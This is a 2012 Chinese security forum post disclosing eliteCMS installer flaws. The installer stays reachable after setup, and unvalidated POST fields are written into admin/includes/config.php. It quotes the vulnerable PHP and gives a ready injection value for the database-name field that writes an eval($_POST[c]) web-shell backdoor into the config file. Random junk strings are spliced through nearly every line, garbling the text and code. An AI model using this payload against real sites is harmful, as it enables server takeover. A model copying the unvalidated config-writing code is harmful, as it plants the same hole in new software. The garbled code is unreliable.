找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2271|回复: 0
打印 上一主题 下一主题

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-18 13:59:27 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
$ `$ j1 N7 b' S2 D# R
7 F  D& I( Y/ q) H" J另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php1 ]" H& ]1 D8 O
我们来看代码:7 n  T" @* R2 ~/ r+ A
, ?8 k2 W4 O  z& w
...- X1 X* b, l6 o" h
elseif ($_GET['step'] == "4") {
6 z5 E9 D9 x( Y  e  {) B: \    $file = "../admin/includes/config.php";
5 \- D% X0 N$ x+ Y    $write = "<?php\n";
$ ?1 e. P$ H+ F! `% i7 a5 C    $write .= "/**\n";- H' U2 A2 i1 a3 e- X- }; G* C
    $write .= "*\n";
! p, j  r  g! t    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";( x2 _6 o, c6 G$ E- R7 t$ N7 P6 m' ^
...略...
9 S( s/ j" s0 }; n5 \    $write .= "*\n";  p4 W3 x8 ?: P& i* D1 C5 a8 x
    $write .= "*/\n";7 e. S% E- c( L0 ~
    $write .= "\n";
$ H1 d7 u) e" R5 Y! W/ A- X    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";# I* U3 J# Q2 q
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
% y- Q( y% v3 q% ]    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
1 b. B! W2 H4 j" V3 P, ?    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
6 i- S% y& J  j" w    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";3 L6 X* x2 ?) k9 U: g* D
    $write .= "if (!\$connection) {\n";8 X  ]8 }5 R& N7 a$ d
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
1 h' f3 q1 c6 v" L) I    $write .= "        \n";: U* ^. E2 P' S' T1 g8 b8 W
    $write .= "} \n";+ y" K" @/ H4 x& S
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
8 y& y9 k7 B/ T3 a% B8 Z+ F9 U    $write .= "if (!\$db_select) {\n";8 Q9 L% N1 m4 Y  t
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
3 x& ?& ?0 p- Q1 E' Z- `" Q    $write .= "        \n";- q( A% K- L7 R1 o; B$ E
    $write .= "} \n";
( ^- U8 f7 n; e6 T$ ?/ W    $write .= "?>\n";
% T$ T; q: Q* \4 K; J& b  S4 ?
8 f9 C6 J" i8 K    $writer = fopen($file, 'w');; o0 J, l3 s# h, r0 U3 x
...
" H7 S6 P9 Y8 M' q! c
0 W9 Z* T4 o8 \3 \! k在看代码:
3 N7 X0 B# o0 N$ p . p' N8 t/ X1 Z3 q6 z) c
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];1 X" H$ J+ V5 M5 w- `  T( f* o
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];. i, h% Y6 l8 k- x
$_SESSION['DB_USER'] = $_POST['DB_USER'];1 O4 b4 C/ Y4 u+ D8 t
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
7 p% g$ N' ^0 e3 Z" u* a+ y7 n" b$ H
) ]1 Z7 T9 @  z) L& \取值未作任何验证8 c. a7 {9 v$ c0 @
如果将数据库名POST数据:9 |8 p9 f- T6 b7 R& e4 w/ k

: p1 z% F* x, _5 ~$ j"?><?php eval($_POST[c]);?><?php
4 J% M9 H; V. w: j 5 h+ i' Q' p3 h  `% e7 g  V+ k
将导致一句话后门写入/admin/includes/config.php8 G% S- J* B6 D' i5 F# }4 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表